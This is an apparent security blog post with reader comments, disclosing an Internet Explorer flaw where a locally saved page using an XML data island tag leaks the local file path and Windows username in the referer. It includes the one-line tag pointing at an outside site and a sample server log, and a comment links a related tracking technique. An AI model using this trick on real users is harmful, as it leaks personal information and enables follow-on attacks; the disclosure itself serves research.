Cenzic 232 Patent
Paid Advertising
web application security lab

IE Sends Local Addresses in Referer Header

I’m not sure why it took me so long to get around to this, but I finally was able to test and verify that this works. In Internet Explorer if you can get a user to save a file to disc and run it it will disclose local drive information in the referrer without using JavaScript. trev sent this one to me, and after some failed tests I got it working (still not quite sure why it didn’t work when I first tried it). Here’s the simple code:

<xml id="xml" src="http://my.site.com/"></xml>

Here’s a sample of what the log looked like when I tested it:

xxx.xxx.xxx.xxx - - [25/Mar/2007:20:58:29 -0700] "GET / HTTP/1.1" 200 2231 "file:///C:/Documents%20and%20Settings/RSnake/Desktop/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

As you can see, not only does this give away local address information, but it can also give you sensitive information like the user name, and the location on the drive. That could easily be used to leverage further attacks, and to my knowledge there is no other way to do this without running JavaScript or some other active control. This completely fails in Firefox as it doesn’t support XML data islands. Nice find, Trev!

10 Responses to “IE Sends Local Addresses in Referer Header”

  1. n00k Says:

    I just thought why one should use the xml tag to do it when there is something like background: url() in css.
    but this obviously doesn’t work. The browser sends an empty referer after saving it to hard disk. I tested it in firefox, opera and konqueror (all linux) and all the same result.

  2. n00k Says:

    Well I just played some more with it and it seems that, at least firefox, drops the referer when making requests from a https page. Probably a similar mechanism doesn’t allow sending the referer header from local files.

  3. Vinicius K-Max Says:

    Nice find!

  4. Awesome AnDrEw Says:

    Hasn’t this existed for a while though? I only ask because I know of several sites that prevent pages from submitting forms after they’ve been saved locally though I’m not sure whether they specifically rule out local areas, or whether it’s a general referer.

  5. RSnake Says:

    It’s probably the opposite. They require that the referrer exists and that it matches the website URL, and if it doesn’t then they bounce it.

  6. Tobmaster Says:

    Hehe Ive seen that some years ago. I managed the for an female actor.
    The funny thing was, that one man she knew as a friend, visited the page from his local startpage. The referrer was
    c:\…..\NAME_OF_THE_FRIEND\Desktop\hotSluts.html

    Well that was the end of the friendship ;).

  7. MustLive Says:

    Interesting technique, RSnake!

    It’s information leak in Internet Explorer.

    As I tested, this method doesn’t work in IE 6, so it works only in IE 7.

  8. MustLive Says:

    I was hurried with my previous test. As I retested, IE 6 send referer with this method (with xml tag). It’s just my local web server configured to not log referers :-). And I wrote my own script and confirmed that this method works.

    So it works in both IE 6 and IE 7.

  9. RSnake Says:

    Thanks for testing, MustLive. It’s a pretty sexy method in some ways - especially if you combine it with my webbug technique: http://ha.ckers.org/webbug.html

  10. xssdude Says:

    it works if you save it on a local file, but then the referer really is that sensitive url. However I could not get it to work in IE7.0, the referer is
    your real referer. So I guess they fixed it. Anyone wanna double check?